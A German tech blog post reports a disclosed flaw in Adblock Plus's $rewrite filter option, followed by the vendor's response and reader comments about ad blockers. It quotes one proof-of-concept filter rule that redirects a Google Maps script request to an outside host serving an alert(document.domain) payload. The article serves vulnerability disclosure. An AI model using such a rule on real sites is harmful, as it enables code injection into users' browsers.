Adblock Plus Filter für Malware-Angriffe ausnutzbar

Die in Browsern verwendeten Adblock Plus Filter können ein Einfallstor für Schadsoftware oder Manipulationen sein, die nur schwer erkennbar sind. So die neueste Erkenntnis eines Sicherheitsforschers, der das Ganze jetzt offen gelegt hat. Nutzer sollten reagieren.


Anzeige

Am 17. Juli 2018 wurde eine neue Version 3.2 von des Werbeblockers Adblock Plus veröffentlicht. Mit der Version 3.2 wurde eine neue Filteroption zum Umschreiben (Redirect) von Anforderungen eingeführt. Einen Tag später folgte AdBlock und gab den Support für die neue Filteroption frei. uBlock, das zu AdBlock gehört, implementierte auch das Feature. Nun bin ich bin bei Bleeping Computer auf das Sicherheitsrisiko dieser Neuerung aufmerksam geworden.

KRITIS-Netzwerk
(Quelle: Pexels Markus Spiske CC0 Lizenz)

Sicherheitsforscher Armin Sebastian ist auf die potentielle Schwachstelle in den Adblock Plus Filtern durch das Redirect gestoßen, die er hier detailliert beschrieben hat. Unter bestimmten Bedingungen ermöglicht die Filteroption $rewrite den Betreuern von Filterlisten, beliebigen Code in Webseiten einzufügen.

Die betroffenen Adblocker-Erweiterungen für Browser haben mehr als 100 Millionen aktive Benutzer. Andererseits ist die Redirect-Funktion trivial auszunutzen. Dabei kann man jeden ausreichend komplexen Webservice, einschließlich Google-Services, angreifen. Andererseits sind Angriffe nur schwer zu erkennen und Erkennungsfunktionen lassen sich in allen gängigen Browsern kaum implementieren.


Anzeige

Armin Sebastian schreibt, dass er die Informationen und Details der Exploit-Kette 'In Anbetracht der Art und der Auswirkungen der aufgedeckten Schwachstellen und angesichts der Tatsache, dass in der Vergangenheit Filterlisten für politisch motivierte Angriffe verwendet wurden' offengelegt. Er hofft, dass dies schnellstmögliche Abhilfemaßnahmen in den betroffenen Browser-Erweiterungen und Webservices gewährleistet.

Der Angriff

Die Filteroption $rewrite wird von einigen Werbeblockern verwendet, um Tracking-Daten zu entfernen und Anzeigen durch Umleitung von Anfragen zu blockieren. Die Option erlaubt das Rewrite nur innerhalb derselben Herkunft, und Anforderungen der Typen SCRIPT, SUBDOCUMENT, OBJECT und OBJECT_SUBREQUEST werden nicht verarbeitet.

Armin Sebastian schreibt, dass jedoch Webservices mit Hilfe dieser Filteroption genutzt werden können, wenn sie mit XMLHttpRequest oder Fetch Codeausschnitte zur Ausführung herunterladen, während Anfragen beliebiger Herkunft erlaubt sind und ein serverseitiges offenes Redirect bereitgestellt wird.

Andererseits aktualisieren die Erweiterungen die Filter regelmäßig, wobei die Intervalle von den Filterlistenbetreibern festgelegt werden. Angriffe sind schwer zu erkennen, da der Ersteller der Filterliste eine kurze Ablaufzeit für definieren kann. So ließe sich die Liste der bösartigen Filter kurz aktivieren und danach durch eine gutartige Filterliste ersetzen – die Spuren wären verwischt. Die ermöglicht Angriffe auf Unternehmen und Einzelpersonen auf der Grundlage von IP-Adressen, von denen die Updates der Filterlisten jeweils angefordert werden.

Armin Sebastian formuliert folgende Bedingungen, die für einen erfolgreichen Manipulationsversuch erfüllt sein müssen:

  • Die Seite muss einen JS-String über XMLHttpRequest oder Fetch laden und den zurückgegebenen Code ausführen.
  • Die Seite darf die Herkunft, von der sie mit Hilfe von Anweisungen der Content Security Policy abrufen kann, nicht einschränken, oder sie darf die endgültige URL der Anforderung nicht validieren, bevor sie den heruntergeladenen Code ausführt.
  • Der Ursprung des nachgeladenen Codes muss eine serverseitige offene Umleitung haben oder beliebige Benutzerinhalte enthalten.

Die Organisationen, die Filterlisten pflegen, können dann ein solches Regel-Update liefern, was so aussehen könnte:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

Die obige Regel leitet die Zielanfrage an den Suchdienst I'm Feeling Lucky von Google weiter, der dann zu einer Seite mit der Nutzdaten: alert(document.domain) umgeleitet wird. Armin Sebastian hat das Ganze an Google berichtet – die schreiben jedoch, dass dieses Redirect ein beabsichtigtes Verhalten sei und hat den 'Fall' geschlossen, da es kein Sicherheitsproblem darstelle. Ich bin nicht so in der Thematik drin, aber die Argumentation des Sicherheitsforschers leuchtet mir ein – und Fälle, wo Seiten von staatlichen Seiten blockiert wurden, gab es ja schon.

Im Blog-Beitrag gibt Armin Sebastian noch weitere Hinweise und empfiehlt Adblock Plus, die $rewrite Filterfunktion zu entfernen. Benutzer können auch zu uBlock Origin wechseln, welches die $rewrite Filteroption nicht unterstützt und ist nicht anfällig für den beschriebenen Angriff ist. Bleeping Computer hat hier noch ein paar Informationen und Beispiele veröffentlicht.

Ergänzung: Rückmeldung von Anbieter

Anbieter von AdBlock Plus hat mir bereits auf Twitter folgende Antwort gegeben:

Die Kernbotschaft des Anbieters laute, dass er halten dies, vor allem aus zwei Gründen:

  1. Wir prüfen alle Autoren, die an Filterlisten mitwirken, die standardmäßig in Adblock Plus aktiviert sind.
  2. Wir überprüfen diese Filterlisten regelmäßig.

für ein sehr unwahrscheinliches Szenario hält. Zudem soll die Ausnutzung nicht trivial sein. Zudem habe man die möglichen Risiken vor Einführung des Filters diskutiert und zusätzliche Maßnahmen auf GitHub dargelegt. Wie jetzt gezeigt wurde, 'reichten diese Maßnahmen für einige Websites nicht aus'. Zudem weist Armin Sebastian darauf hin, dass auch staatliche Institutionen da mit rein rühren könnten. Daher lege ich das Augenmerk auf folgende Aussage des Anbieters:

Es liegt in unserer Verantwortung, unsere Benutzer zu schützen, und obwohl das tatsächliche Risiko sehr gering ist, haben wir uns entschieden, die redirect-Option in den Filtern mit dem nächsten Update von Adblock Plus zu entfernen.

Die Entwickler prüfen zusätzlich weitere Optionen, wie z.B. die Beschränkung aller Filterlisten auf https, was bei den standardmäßig aktivierten Listen bereits der Fall ist. Es bewegt sich also was.

Ergänzung: Blog-Leser Rudi wies mich auf den Artikel von Hanno Böck auf Golem hin. Ganz lesenswert, da Hanno noch einige Erklärungen mitliefert.

Ähnliche Artikel
Google verhindert Adblocking in Chromium-Engines
Botfrei.de geht an Adblock-Plus-Entwickler Eyeo
Forscher warnen: AdBlocker nutzlos, neue Angriffsvektoren
Das Adblocker BGH-Urteil
Google Chrome bekommt 2018 einen Adblocker


Anzeige

Dieser Beitrag wurde unter Sicherheit abgelegt und mit , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

8 Antworten zu Adblock Plus Filter für Malware-Angriffe ausnutzbar

  1. RUTZ-AhA sagt:

    Ich nutze lieber die Erweiterung uMatrix, da gibt es derartige Probleme nicht. Gorhill ist charakterlich sauber und ein erklärter Gegner von Adblock und co.

    uMatrix kann am meisten, und ein mal von grundauf konfiguriert ist es am leichtesten zu handhaben.

    No-Script hatte ich eine zeitlang in Benutzung, aber das ist mir zu nervig in der Handhabung.

    • Steter Tropfen sagt:

      Leicht zu handhaben finde ich all die uBlock-Versionen nun wirklich nicht. Allein, dass es davon mehrere Varianten gibt, ist doch nervig.
      Nichts ist selbsterklärend und man findet auch keinerlei verständliche Anleitung. Auch nach Jahren ist mir z.B. noch nicht klar, was die zwei Spalten bedeuten (v.a. welche steht für generell, welche nur für die jeweilige Seite) und was es mit den +/- darin auf sich hat: Eine Beschriftung im Spaltenkopf oder ein Tooltip wären wohl schon zu viel verlangt.
      Ganz zu schweigen von eigenen Filtern mit Platzhaltern. Da muss man offenbar erst eine eigene Programmiersprache lernen, um die gültig definieren zu können.

      Und muss ein „charakterlich sauberer" Programmierer gleich ein erklärter Gegner alternativer Lösungen sein? Kann er nicht einfach leben und leben lassen?

  2. Micha45 sagt:

    Ich kann einfach nicht begreifen, wieso irgendjemand Adblock Plus verwendet.
    Es gibt doch mit uBlock Origin eine weitaus bessere und effizientere Alternative.

    Adblock Plus hat sich meiner Meinung nach vollkommen disqualifiziert. Der Entwickler lässt sich von Webseitenbetreiber bezahlen, damit die Seiten dann in der Erweiterung still und heimlich auf eine Whitelist gesetzt werden. Die Entwickler sind nichts anderes als Söldner, die die Leute für dumm verkaufen.
    Hier gibt es Näheres dazu:
    https://de.wikipedia.org/wiki/Adblock_Plus

    Im Artikel steht: "uBlock gehört zu Adblock".
    Das stimmt zwar, könnte aber zu Irritationen führen.

    Die Entwicklerplattform uBlock.org wurde zwar von Adblock vereinnahmt. Einer der Entwickler von uBlock.org, Raymond Hill, stieg jedoch aus und entwickelte eigenständig die beliebte Erweiterung "uBlock Origin" und ist außerdem an der Entwicklung von "uMatrix" beteiligt.

    Mit uBlock Origin und/oder uMatrix ist man bestens versorgt und braucht nicht auf dieses fragwürdige Adblock Plus zurückzugreifen.
    noScript braucht man dann auch nicht mehr, außerdem hat sich dessen Entwickler bei mir ebenfalls disqualifiziert.
    Stichwort "Firefox Engine".

    • RUTZ-AhA sagt:

      "Mit uBlock Origin und/oder uMatrix ist man bestens versorgt und braucht nicht auf dieses fragwürdige Adblock Plus zurückzugreifen."

      Wenn du recht hast, hast du recht :-)

      Wobei ich uMatrix vorziehe, weil es einfacher zu handhaben geht. Für die Grundkonfiguration wird jeder einzelne Punkt über Maushover erklärt. Wenn das einmal gemacht ist, lässt sich auf jeder Webseite alles temporär oder dauerhaft blockieren, ganz nach Bedarf. Das ist das Beste daran.

      • GPBurth sagt:

        Wobei ich den Ansatz "unaufdringliche Werbung darf bleiben" an sich nicht schlecht finde:
        Werbung, die das ganze Fenster (oder wesentliche Teile) verdeckt (heute Layer-Ads, früher Popups), unnötig zappelt, Videos abspielt (gerne auch mit Ton…) oder sich als normalen Inhalt versteckt sollte weg.
        Klassische Werbebanner oder Werbung in der Seitenleiste, am besten entsprechend markiert, stört dagegen nicht – und kann sogar sinnvoll sein. Vor allem dann, wenn sie dem Inhalt angepasst ist und vorzugsweise direkt vom selben Host wie die Seite selber ausgeliefert wird.
        Positivbeispiel: borncity.com – hier gibt es werbetechnisch wenig zu beanstanden.

        Wenn durch einen Adblocker nur die Exzesse geblockt würden wäre das in meinen Augen ein akzeptabler Kompromiss. "Gute" Webseiten würden nichts merken, "schlechte" hätten nichts mehr (oder weniger) von aufdringlicher Werbung und würden das irgendwann bleiben lassen – wodurch die Adblocker selber irgendwann unnötig würden.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.

Du findest den Blog gut, hast aber Werbung geblockt? Du kannst diesen Blog auch durch eine Spende unterstützen.